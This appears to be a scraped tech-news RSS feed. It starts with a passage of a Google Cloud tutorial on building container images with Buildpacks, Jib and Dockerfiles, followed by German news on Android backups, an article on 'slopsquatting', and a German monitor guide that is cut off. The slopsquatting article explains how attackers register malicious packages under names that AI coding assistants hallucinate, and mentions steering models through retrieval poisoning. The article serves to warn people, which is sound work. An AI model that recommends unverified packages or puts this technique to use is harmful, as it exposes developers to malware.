<div class="block-paragraph"><p>If you want to run this locally make sure you have Java 8 installed and from the project root directory, run:</p><p><code>./mvnw compile exec:java</code></p><p>You can test the server by visiting: <a href="http://localhost:8080/" target="_blank">http://localhost:8080</a></p><h3>Container Builder: Buildpacks</h3><p>We have an application that we can run locally so let's get back to those Container Builders. Earlier you learned that Heroku invented Buildpacks to create standard, polyglot ways to go from source to a Container Image. When Docker / OCI Containers started gaining popularity Heroku and Pivotal worked together to make their Buildpacks work with Docker / OCI Containers. That work is now a sandbox Cloud Native Computing Foundation project: <a href="https://buildpacks.io/" target="_blank">https://buildpacks.io/</a></p><p>To use Buildpacks you will need to <a href="https://docs.docker.com/get-started/" target="_blank">install Docker</a> and <a href="https://github.com/buildpacks/pack/releases" target="_blank">the pack tool</a>. Now from the command line tell Buildpacks to take your source and turn it into a Container Image:</p><p><code>pack build --builder=gcr.io/buildpacks/builder:v1 comparing-docker-methods:buildpacks</code></p><p>Magic! You didn't have to do anything and the Buildpacks knew how to turn that Java application into a Container Image. It even works on Go, NodeJS, Python, and .Net apps out-of-the-box. So what just happened?  Buildpacks inspect your source and try to identify it as something it knows how to build. In the case of our sample application it noticed the <code>pom.xml</code> file and decided it knows how to build Maven-based applications. The <code>--builder</code> flag told it where to get the Buildpacks from. In this case, <code>gcr.io/buildpacks/builder:v1</code> are the Container Image coordinates to <a href="https://cloud.google.com/blog/products/containers-kubernetes/google-cloud-now-supports-buildpacks">Google Cloud's Buildpacks</a>. Alternatively you could use the Heroku or Paketo Buildpacks. The parameter <code>comparing-docker-methods:buildpacks</code> is the Container Image coordinates for where to store the output. In this case it stores on the local docker daemon. You can now run that Container Image locally with <code>docker</code>:</p><p><code>docker run -it -ePORT=8080 -p8080:8080 comparing-docker-methods:buildpacks</code></p><p>Of course you can also run that Container Image anywhere that runs Docker / OCI Containers like Kubernetes and Cloud Run.</p><p>Buildpacks are nice because in many cases they just work and you don't have to do anything special to turn your source into something runnable. But the resulting Container Images created from Buildpacks can be a bit bulky. Let's use a tool called <a href="https://github.com/wagoodman/dive" target="_blank"><code>dive</code></a> to examine what is in the created container image:</p><p><code>dive comparing-docker-methods:buildpacks</code></p><p></p><p></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Dive_comparison.max-1000x1000.png" alt="Container Image">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>Here you can see the Container Image has 11 layers and a total image size of 319MB. With <code>dive</code> you can explore each layer and see what was changed. In this Container Image the first 6 layers are the base operating system. Layer 7 is the JVM and layer 8 is our compiled application. Layering enables great caching so if only layer 8 changes, then layers 1 through 7 do not need to be re-downloaded. One downside of Buildpacks is how (at least for now) all of the dependencies and compiled application code are stored in a single layer. It would be better to have separate layers for the dependencies and the compiled application.</p><p>To recap, Buildpacks are the easy option that "just works" right out-of-the-box. But the Container Images are a bit large and not optimally layered.</p><h3>Container Builder: Jib</h3><p>The open source <a href="https://github.com/GoogleContainerTools/jib" target="_blank">Jib project</a> is a Java library for creating Container Images with Maven and Gradle plugins. To use it on a Maven project (like the one we from above), just add a build plugin to the <code>pom.xml</code> file:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', '&lt;plugin&gt;\r\n    &lt;groupId&gt;com.google.cloud.tools&lt;/groupId&gt;\r\n    &lt;artifactId&gt;jib-maven-plugin&lt;/artifactId&gt;\r\n    &lt;version&gt;2.6.0&lt;/version&gt;\r\n&lt;/plugin&gt;'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860d30&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>Now a Container Image can be created and stored in the local docker daemon by running:</p><p><code>./mvnw compile jib:dockerBuild -Dimage=comparing-docker-methods:jib</code></p><p>Using <code>dive</code> we will see that the Container Image for this application is now only 127MB thanks to slimmer operating system and JVM layers. Also, on a Spring Boot application we can see how Jib layers the dependencies, resources, and compiled application for better caching:</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Spring_Boot_Application.max-1000x1000.png" alt="Spring Boot Application">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>In this example the 18MB layer contains the runtime dependencies and the final layer contains the compiled application. Unlike with Buildpacks the original source code is not included in the Container Image. Jib also has a great feature where you can use it without docker being installed, as long as you store the Container Image on an external Container Registry (like DockerHub or the Google Cloud Container Registry). Jib is a great option with Maven and Gradle builds for Container Images that use the JVM.</p><h3>Container Builder: Dockerfile</h3><p>The traditional way to create Container Images is built into the <code>docker</code> tool and uses a sequence of instructions defined in a file usually named <code>Dockerfile</code>. Here is a <code>Dockerfile</code> you can use with the sample Java application:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'FROM adoptopenjdk/openjdk8 as builder\r\n\r\nWORKDIR /app\r\nCOPY . /app\r\n\r\nRUN ./mvnw compile jar:jar\r\n\r\nFROM adoptopenjdk/openjdk8:jre\r\n\r\nCOPY --from=builder /app/target/*.jar /server.jar\r\n\r\nCMD ["java", "-jar", "/server.jar"]'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860d90&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>In this example, the first four instructions start with the AdoptOpenJDK 8 Container Image and build the source to a Jar file. The final Container Image is created from the AdoptOpenJDK 8 JRE Container Image and includes the created Jar file. You can run <code>docker</code> to create the Container Image using the <code>Dockerfile</code> instructions:</p><p><code>docker build -t comparing-docker-methods:dockerfile </code></p><p>Using <code>dive</code> we can see a pretty slim Container Image at 209MB:<br></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Container_image.max-1000x1000.png" alt="Container Image">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>With a <code>Dockerfile</code> we have full control over the layering and base images. For example, we could use the <a href="https://github.com/GoogleContainerTools/distroless/tree/master/java" target="_blank">Distroless Java base image</a> to trim down the Container Image even further. This method of creating Container Images provides a lot of flexibility but we do have to write and maintain the instructions.</p><p>With this flexibility we can do some cool stuff. For example, we can use GraalVM to create a "native image" of our application. This is an ahead-of-time compiled binary which can reduce startup time, reduce memory usage, and alleviate the need for a JVM in the Container Image. And we can go even further and create a statically linked native image which includes everything needed to run so that even an operating system is not needed in the Container Image. Here is the Dockerfile to do that:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'FROM oracle/graalvm-ce:20.2.0-java11 as builder\r\n\r\nWORKDIR /app\r\nCOPY . /app\r\n\r\nRUN gu install native-image\r\n\r\n# BEGIN PRE-REQUISITES FOR STATIC NATIVE IMAGES FOR GRAAL 20.2.0\r\n# SEE: https://github.com/oracle/graal/blob/master/substratevm/StaticImages.md\r\nARG RESULT_LIB="/staticlibs"\r\n\r\nRUN mkdir ${RESULT_LIB} &amp;&amp; \\\r\n    curl -L -o musl.tar.gz https://musl.libc.org/releases/musl-1.2.1.tar.gz &amp;&amp; \\\r\n    mkdir musl &amp;&amp; tar -xvzf musl.tar.gz -C musl --strip-components 1 &amp;&amp; cd musl &amp;&amp; \\\r\n    ./configure --disable-shared --prefix=${RESULT_LIB} &amp;&amp; \\\r\n    make &amp;&amp; make install &amp;&amp; \\\r\n    cd / &amp;&amp; rm -rf /muscl &amp;&amp; rm -f /musl.tar.gz &amp;&amp; \\\r\n    cp /usr/lib/gcc/x86_64-redhat-linux/4.8.2/libstdc++.a ${RESULT_LIB}/lib/\r\n\r\nENV PATH="$PATH:${RESULT_LIB}/bin"\r\nENV CC="musl-gcc"\r\n\r\nRUN curl -L -o zlib.tar.gz https://zlib.net/zlib-1.2.11.tar.gz &amp;&amp; \\\r\n   mkdir zlib &amp;&amp; tar -xvzf zlib.tar.gz -C zlib --strip-components 1 &amp;&amp; cd zlib &amp;&amp; \\\r\n   ./configure --static --prefix=${RESULT_LIB} &amp;&amp; \\\r\n    make &amp;&amp; make install &amp;&amp; \\\r\n    cd / &amp;&amp; rm -rf /zlib &amp;&amp; rm -f /zlib.tar.gz\r\n#END PRE-REQUISITES FOR STATIC NATIVE IMAGES FOR GRAAL 20.2.0\r\n\r\nRUN ./mvnw compile jar:jar\r\n\r\nRUN native-image \\\r\n  --static \\\r\n  --libc=musl \\\r\n  --no-fallback \\\r\n  --no-server \\\r\n  --install-exit-handlers \\\r\n  -H:Name=webapp \\\r\n  -cp /app/target/*.jar \\\r\n  com.google.WebApp\r\n\r\nFROM scratch\r\n\r\nCOPY --from=builder /app/webapp /webapp\r\n\r\nENTRYPOINT ["/webapp"]'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860df0&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>You will see there is a bit of setup needed to support static native images. After that setup the Jar is compiled like before with Maven. Then the <code>native-image</code> tool creates the binary from the Jar. The <code>FROM scratch</code> instruction means the final container image will start with an empty one. The statically linked binary created by <code>native-image</code> is then copied into the empty container.</p><p>Like before you can use <code>docker</code> to build the Container Image:</p><p><code>docker build -t comparing-docker-methods:graalvm .</code></p><p>Using <code>dive</code> we can see the final Container Image is only 11MB!</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Dive_Image.max-1000x1000.png" alt="Container Image">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>And it starts up super fast because we don't need the JVM, OS, etc. Of course GraalVM is not always a great option as there are some challenges like dealing with reflection and debugging. You can read more about this in my blog, <a href="https://jamesward.com/2020/05/07/graalvm-native-image-tips-tricks/" target="_blank">GraalVM Native Image Tips &amp; Tricks</a>.</p><p>This example does capture the flexibility of the <code>Dockerfile</code> method and the ability to do anything you need. It is a great escape hatch when you need one.</p><h3>Which Method Should You Choose?</h3><p></p><ul><li>The easiest, polyglot method: Buildpacks</li><li>Great layering for JVM apps: Jib</li><li>The escape hatch for when those methods don't fit: Dockerfile</li></ul><p></p><p>Check out my <a href="https://github.com/jamesward/comparing-docker-methods" target="_blank">comparing-docker-methods project</a> to explore these methods as well as the mentioned Spring Boot + Jib example.</p></div>
<div class="block-related_article_tout">





<div class="uni-related-article-tout h-c-page">
  <section class="h-c-grid">
    <a href="https://cloud.google.com/blog/products/containers-kubernetes/google-cloud-now-supports-buildpacks/" data-analytics='{
                       "event": "page interaction",
                       "category": "article lead",
                       "action": "related article - inline",
                       "label": "article: {slug}"
                     }' class="uni-related-article-tout__wrapper h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
        h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3 uni-click-tracker">
      <div class="uni-related-article-tout__inner-wrapper">
        <p class="uni-related-article-tout__eyebrow h-c-eyebrow">Related Article</p>

        <div class="uni-related-article-tout__content-wrapper">
          <div class="uni-related-article-tout__image-wrapper">
            <div class="uni-related-article-tout__image"></div>
          </div>
          <div class="uni-related-article-tout__content">
            <h4 class="uni-related-article-tout__header h-has-bottom-margin">Announcing Google Cloud buildpacks—container images made easy</h4>
            <p class="uni-related-article-tout__body">Google Cloud buildpacks make it much easier and faster to build applications on top of containers.</p>
            <div class="cta module-cta h-c-copy  uni-related-article-tout__cta muted">
              <span class="nowrap">Read Article
                <svg class="icon h-c-icon" role="presentation">
                  <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#mi-arrow-forward"></use>
                </svg>
              </span>
            </div>
          </div>
        </div>
      </div>
    </a>
  </section>
</div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google erlaubt Android-Nutzern ab sofort kein Gratis-Backup mehr]]></title>
<description><![CDATA[Google wird nun alle Daten von Android-Sicherungskopien auf den Speicherplatz im Google-Konto des Nutzers anrechnen, wie die Seite Engadget berichtet. Bislang wirkten sich lediglich Inhalte in Google Fotos sowie Bilder und Videos in MMS-Sicherungskopien auf das Speicherkontingent aus.



Für neue...]]></description>
<link>https://tsecurity.de/de/3662828/it-nachrichten/google-erlaubt-android-nutzern-ab-sofort-kein-gratis-backup-mehr/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662828/it-nachrichten/google-erlaubt-android-nutzern-ab-sofort-kein-gratis-backup-mehr/</guid>
<pubDate>Sun, 12 Jul 2026 08:02:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Google wird nun alle Daten von Android-Sicherungskopien auf den Speicherplatz im Google-Konto des Nutzers anrechnen, wie die Seite <a href="https://www.engadget.com/2209189/google-will-now-count-all-android-backup-data-toward-your-storage-cap/">Engadget</a> berichtet. Bislang wirkten sich lediglich Inhalte in Google Fotos sowie Bilder und Videos in MMS-Sicherungskopien auf das Speicherkontingent aus.</p>



<p>Für neue Android-Nutzer tritt die Änderung ab heute, 7. Juli 2026, in Kraft. Für bestehende Nutzer wird sie in den kommenden Monaten schrittweise eingeführt.</p>



<p>Laut Google werden die Auswirkungen dieser Änderung voraussichtlich begrenzt sein. Android-Sicherungskopien werden im Durchschnitt etwa 40 Megabyte zusätzlichen Speicherplatz beanspruchen. Gleichzeitig werden weitere Einstellungen eingeführt, die den Nutzern mehr Kontrolle darüber geben, was gesichert wird.</p>



<p>Zuvor wurde etwa bekannt, <a href="https://www.pcwelt.de/article/3181692/alle-android-nutzer-bekommen-nun-diese-wichtige-backupfunktion.html" target="_blank" rel="noreferrer noopener">dass Android-Nutzer eine wichtige neue Backup-Funktion erhalten</a>, mit der sie selbst entscheiden können, welche App-Daten gesichert werden sollen und welche nicht. Demnächst möchte Google noch einführen, dass Nutzer ihre Geräteeinstellungen, den Anrufverlauf sowie SMS- und MMS-Nachrichten aus dem Sicherungsvorgang ausschließen können.</p>



<p>Es ist erwähnenswert, dass Google im Mai gleichzeitig den kostenlosen Speicherplatz für neue Konten <a href="https://www.pcwelt.de/article/3140205/googles-gratis-onlinespeicher-schrumpft-falls-sie-google-nicht-ihre-telefonnummer-verraten-test.html" target="_blank" rel="noreferrer noopener">von 15 Gigabyte auf 5 Gigabyte reduziert hat.</a> Es sei denn, der Nutzer verknüpft eine Telefonnummer mit dem Konto.</p>



<p>Je nachdem, wie viele Daten Sie bereits in der Google Cloud gesichert haben, könnte es also eng werden, selbst wenn die Sicherung nur wenige MB groß ist. Oder Sie merken von der Änderung nicht wirklich viel, da Sie ohnehin auf andere Backup-Methoden setzen.</p>



<p>Ein Upgrade auf 100 GB in <a href="https://one.google.com/about/plans?hl=de&amp;g1_landing_page=60" target="_blank" rel="noreferrer noopener">Google One</a> kostet 1,99 Euro monatlich, 2,99 Euro für 200 GB oder 9,99 Euro monatlich für 2 TB Speicherplatz. Mit enthalten ist auch der Zugriff auf “neue und leistungsstarke Funktionen” in Google Gemini.</p>



<p><a href="https://www.pcwelt.de/article/3006100/die-besten-online-backup-dienste-im-vergleich-2.html" target="_blank" rel="noreferrer noopener">Die besten Online-Backup-Dienste im Vergleich: Nie mehr Daten verlieren</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Forget typosquatting; slopsquatting is the software supply chain threat created by AI coding tools]]></title>
<description><![CDATA[Slopsquatting represents an emerging supply chain threat made possible by AI hallucinations. As developers increasingly rely on AI coding assistants, they unknowingly grant cybercriminals access to their software from day one. Understanding what slopsquatting isSlopsquatting is a new type of supp...]]></description>
<link>https://tsecurity.de/de/3662303/it-nachrichten/forget-typosquatting-slopsquatting-is-the-software-supply-chain-threat-created-by-ai-coding-tools/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662303/it-nachrichten/forget-typosquatting-slopsquatting-is-the-software-supply-chain-threat-created-by-ai-coding-tools/</guid>
<pubDate>Sat, 11 Jul 2026 20:32:20 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Slopsquatting represents an emerging supply chain threat made possible by AI hallucinations. As developers increasingly rely on AI coding assistants, they unknowingly grant <a href="https://venturebeat.com/security/prompt-injection-is-exploiting-enterprise-ais-biggest-design-flaws-by-targeting-agents-rag-pipelines-and-model-routers">cybercriminals</a> access to their software from day one. </p><h2><b>Understanding what slopsquatting is</b></h2><p>Slopsquatting is a new type of supply chain attack that uses large language model (LLM) <a href="https://www.captechu.edu/blog/ai-driven-threats-in-software-supply-chains"><u>hallucinations to inject malicious code</u></a> into development workflows. The term combines "AI slop" and "typosquatting," a deceptive practice where attackers register misspelled or lookalike versions of popular domains to prey on users who enter URLs incorrectly.</p><p>This novel attack vector exploits LLMs' tendency to generate fictitious software package names, which threat actors can then register and populate with malicious code.</p><p>During AI-assisted coding, the model may generate fake open-source packages — bundled collections of files, programs and installation tools. This alone is not necessarily harmful. However, if an attacker registers that fake package name, they can inject malware that gets incorporated directly into a developer's codebase.</p><h2><b>How AI creates a supply chain risk</b></h2><p>Traditionally, AI <a href="https://www.pivotpointsecurity.com/ai-security-and-ai-safety-how-do-they-relate/"><u>safety risks stem from hallucinations</u></a>, which can adversely affect users who treat misinformation as valid. However, those same hallucinations have evolved into exploitable security vulnerabilities.</p><p>Typosquatting is a deceptive practice where a cybercriminal registers a mispelled version of a popular package to trick developers. It has existed for decades, so registries have built protections against it. </p><p>However, AI has changed the <a href="https://venturebeat.com/security/claude-mythos-exposed-a-hard-truth-your-enterprise-patching-process-is-way-too-slow">threat model</a>. It recommends fictitious packages that sound plausible rather than making simple misspellings. Once attackers learn which hallucinated packages models tend to invent, they can register malware-filled packages under those names.</p><p>Since the hallucinated packages are not simply typoed versions of popular libraries, there are no protections against this practice at scale. For example, the registry protects against an attacker publishing "crossenv," a squat of the popular "cross-env" package. However, it would not identify "mpn install cross-env file" or "cross-env-extended" as threats.</p><h3><b>Hallucinations are persistent and severe</b></h3><p>Even if many LLMs recommend the same hallucinated package, widespread compromise is still possible. Malicious packages could remain undetected in production for months or even years, allowing threat actors to passively inject malware across countless environments. </p><p>One research <a href="https://arxiv.org/abs/2506.12995"><u>team analyzed 31,267 vulnerabilities</u></a> belonging to 14,675 packages across 10 programming languages. They discovered that reported vulnerabilities are increasing at an annual rate of 98%, faster growth than the 25% annual increase in the number of open-source software packages. The team also observed an 85% increase in the average lifespan of vulnerabilities, indicating a decline in security.</p><h3><b>Real-world dangers of AI hallucinations</b></h3><p><a href="https://venturebeat.com/security/ai-tool-poisoning-exposes-a-major-flaw-in-enterprise-agent-security">Malicious actors</a> can create open-access packages under the same name as commonly hallucinated libraries. Instead of standard code, they are filled with malware. The models believe they are referring to existing packages, so they often repeat the same hallucinated names. Since the hallucinations are not random, attackers could theoretically register packages that trick tens of thousands of developers.</p><p>These packages appear legitimate. String similarity to real libraries makes them recognizable. One-character typos suggest simple mistakes rather than malicious intent. Even fully fabricated names remain believable when the AI presents them in proper context. Detection is challenging, as developers trust their coding assistants to recommend valid dependencies.</p><h2><b>Why are LLMs hallucinating packages?</b></h2><p>LLMs generate the statistically most likely answer rather than prioritizing accuracy. Hallucinations are relatively common as a result. One study found hallucination rates <a href="https://www.nature.com/articles/s43856-025-01021-3"><u>range from 50% to 82%</u></a>, depending on the model and prompting method. Even GPT-4o, the best-performing model, goes no lower than 23%, even with prompt-based mitigation.</p><p>Adversarial hallucination attacks could worsen this problem. Threat actors can leverage token-level manipulation or retrieval poisoning to force models to hallucinate in ways they want, increasing the likelihood that models recommend their malicious packages.</p><h2><b>Which LLMs are prone to slopsquatting?</b></h2><p>While all LLMs are prone to slopsquatting, some are more vulnerable than others. The likelihood of producing hallucinated packages during code generation depends on the model. Proprietary models are four times less likely to generate hallucinated packages than open-source models.</p><p>One research group proved this by conducting 30 tests across 30 different systems. Out of <a href="https://arxiv.org/html/2406.10279v3"><u>the 576,000 code samples</u></a> and 2.23 million packages it produced, 19.7% were hallucinations. GPT-4.0 Turbo had a hallucination rate of 3.59%, while DeepSeek 1B, the best-performing open-source model, reached 13.63%.</p><p>This research suggests that organizations relying on open-source AI tools for code generation are roughly four times more exposed to slopsquatting attacks. That doesn’t necessarily mean proprietary tools will always remain safer, though. Once attackers realize this disparity, they may manipulate proprietary LLMs to take advantage of perceived safety.</p><h2><b>Vibe coding contributes to the problem</b></h2><p>Software developers who use AI tools estimate that <a href="https://shiftmag.dev/state-of-code-2025-7978/"><u>over 40 percent of the code</u></a> they commit includes AI assistance. They expect that percentage will increase considerably within the next few years. Already, 72% of those who have tried AI use it daily.</p><p>The uptick in vibe coding and AI-assisted coding amplifies the threat surface. As more developers integrate AI tools into their workflows without implementing proper verification processes, the attack surface for slopsquatting continues to expand.</p><p>For those using AI to assist with coding, double-checking output is essential. Verifying that recommended packages actually exist in official repositories before incorporating them into projects reduces risk.</p><h2><b>Navigating AI-assisted development</b></h2><p>Implementing automated checks that validate package names against known registries can help catch hallucinated packages before they enter production code. Security teams should also monitor for unusual package installations and maintain up-to-date threat intelligence on known slopsquatting campaigns.</p><p><i>Zac Amos is the Features Editor at </i><a href="https://rehack.com/"><i><u>ReHack</u></i></a><i>.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Monitor-Upgrade für Ihren PC: OLED, IPS oder Mini-LED – was bringt im Alltag wirklich etwas?]]></title>
<description><![CDATA[Ein neuer Monitor ist das wohl spürbarste Upgrade für jeden PC-Arbeitsplatz. Schließlich starren wir täglich stundenlang genau auf diese eine Komponente. Während vor einigen Jahren noch vor allem die Bildschirmdiagonale und die Auflösung entscheidend waren, stehen Käufer heute vor einer technolog...]]></description>
<link>https://tsecurity.de/de/3661428/it-nachrichten/monitor-upgrade-fuer-ihren-pc-oled-ips-oder-mini-led-was-bringt-im-alltag-wirklich-etwas/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661428/it-nachrichten/monitor-upgrade-fuer-ihren-pc-oled-ips-oder-mini-led-was-bringt-im-alltag-wirklich-etwas/</guid>
<pubDate>Sat, 11 Jul 2026 09:17:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Ein <a href="https://www.pcwelt.de/article/3041188/bester-monitor-test.html" target="_blank" rel="noreferrer noopener">neuer Monitor</a> ist das wohl spürbarste Upgrade für jeden PC-Arbeitsplatz. Schließlich starren wir täglich stundenlang genau auf diese eine Komponente. Während vor einigen Jahren noch vor allem die Bildschirmdiagonale und die Auflösung entscheidend waren, stehen Käufer heute vor einer technologischen Grundsatzfrage.</p>



<p>Die Eier legende Wollmilchsau gibt es nämlich leider immer noch nicht: Was beim nächtlichen Zocken für offene Münder sorgt, kann Sie beim morgendlichen Excel-Marathon im hell erleuchteten <a href="https://www.pcwelt.de/article/1187460/home-office-29-tipps-fuer-die-arbeit-von-zuhause.html" target="_blank" rel="noreferrer noopener">Homeoffice</a> schnell im Stich lassen. </p>



<p>Damit Sie beim Upgrade nicht in technische Fettnäpfchen treten, dröseln wir die Stärken und Schwächen der drei wichtigsten Technologien auf und geben eine Kaufberatung für die unterschiedlichen Modelltypen.</p>



<h2 class="wp-block-heading">Die drei Panel-Technologien im Alltags-Check</h2>



<p>Um das Maximum aus Ihrem Budget herauszuholen, sollten Sie die Charakteristiken der Panel-Typen kennen. Jede Technik hat ein optimales Einsatzgebiet.</p>



<h2 class="wp-block-heading">1. Der IPS-Monitor: Unkomplizierter Allrounder für den Alltag</h2>



<p>IPS (In-Plane Switching) gilt seit Jahren als der vernünftige Alleskönner unter den Display-Technologien. Die Technologie ist ausgereift, langlebig und bietet hervorragende Farbtreue sowie extrem stabile Blickwinkel. Egal, ob Sie schräg vor dem Monitor sitzen oder ein Kollege von der Seite daraufblickt: Die Farben verfälschen sich nicht. </p>



<p>Das größte Manko dieser Technik ist jedoch der systembedingte Kontrast. Weil hier eine dauerhafte Hintergrundbeleuchtung durch die Flüssigkristalle scheint, schimmert Schwarz im dunklen Raum eher dunkelgrau (<strong>IPS-Glow</strong>).</p>



<h3 class="wp-block-heading">Für wen eignen sich IPS-Displays?</h3>



<p>Dieser Displaytyp ist ideal fürs Homeoffice, klassische Büroarbeiten, Bildbearbeitung und Gelegenheitsspieler, die einen zuverlässigen Monitor ohne das Risiko von Einbrenneffekten suchen.</p>



<h2 class="wp-block-heading">Produktempfehlung: LG UltraGear 27GR75Q-B</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51eddec11d4"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/LG-Electronics-27GR75Q-B.jpg?quality=50&amp;strip=all&amp;w=754" alt="LG Electronics 27GR75Q-B" class="wp-image-3168001" width="754" height="1199" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">LG</p></div>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn shopping-cart-icon-white link-6-button" href="https://www.amazon.de/dp/B0BVWMSP1V?tag=pcwelt.de-21&amp;ascsubtag=4-0-3167989-7-0-0-0-0&amp;ascsubtag=rss" target="_blank" rel="nofollow" data-vars-link-position="CTA Button" data-domain-name="amazon" data-subtag="4-0-3167989-7-0-0-0-0">LG UltraGear 27GR75Q-B bei Amazon ansehen</a></div>


<p>Preis: ca. 299 Euro</p>



<p><strong>Technik-Specs:</strong></p>



<ul class="wp-block-list">
<li><strong>Bilddiagonale &amp; Format:</strong> 27 Zoll (68,5 cm), Seitenverhältnis 16:9</li>



<li><strong>Auflösung &amp; Panel-Typ:</strong> WQHD (2.560 × 1.440 Pixel), IPS-Panel</li>



<li><strong>Farbraum &amp; Helligkeit:</strong> 99 % sRGB-Abdeckung, HDR10-Unterstützung, maximale Helligkeit 300 Nits</li>



<li><strong>Bildwiederholrate &amp; Reaktionszeit:</strong> 165 Hz nativ, 1 ms</li>



<li><strong>Synchronisation:</strong> AMD FreeSync Premium, Nvidia G-Sync Compatible</li>



<li><strong>Ergonomie-Funktionen:</strong> Höhenverstellbar, neigbar, schwenkbar, Pivot-Funktion (90-Grad-Drehung)</li>



<li><strong>Zusatzfunktionen:</strong> Flicker-Safe-Hintergrundbeleuchtung, Blaulichtreduktion (Reader Mode), softwarebasierte Menüsteuerung (OnScreen Control)</li>



<li><strong>Anschlüsse:</strong> 1 × DisplayPort 1.4, 2 × HDMI (Version herstellerseitig nicht spezifiziert), 1 × 3,5-mm-Klinkenanschluss (Kopfhörer)</li>
</ul>



<p>Der <a href="https://www.amazon.de/dp/B0BVWMSP1V?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">LG UltraGear 27GR75Q-B</a> bedient die im Consumer-Bereich weitverbreitete Kombination aus 27-Zoll-Diagonale und WQHD-Auflösung. Das verbaute IPS-Panel bietet eine Pixeldichte, die für eine angenehm scharfe Textdarstellung im Büroalltag sorgt, während die Bildwiederholrate von 165 Hz flüssige Bildbewegung beim Gaming verspricht. </p>



<p>Mit einer herstellerseitig angegebenen sRGB-Farbraumabdeckung von 99 Prozent eignet sich das Modell auch für grundlegende Bildbearbeitungen im semiprofessionellen Bereich.</p>



<h2 class="wp-block-heading">2. Mini-LED-Monitore: HDR-Leuchtkraft für helle Räume</h2>



<p>Mini-LED ist die Evolution des klassischen LCD-Monitors. Statt einiger großer Leuchtdioden sitzen dabei jedoch tausende winzige LEDs hinter dem Panel, die in hunderten separaten Zonen geregelt werden können (<strong>Local Dimming</strong>). </p>



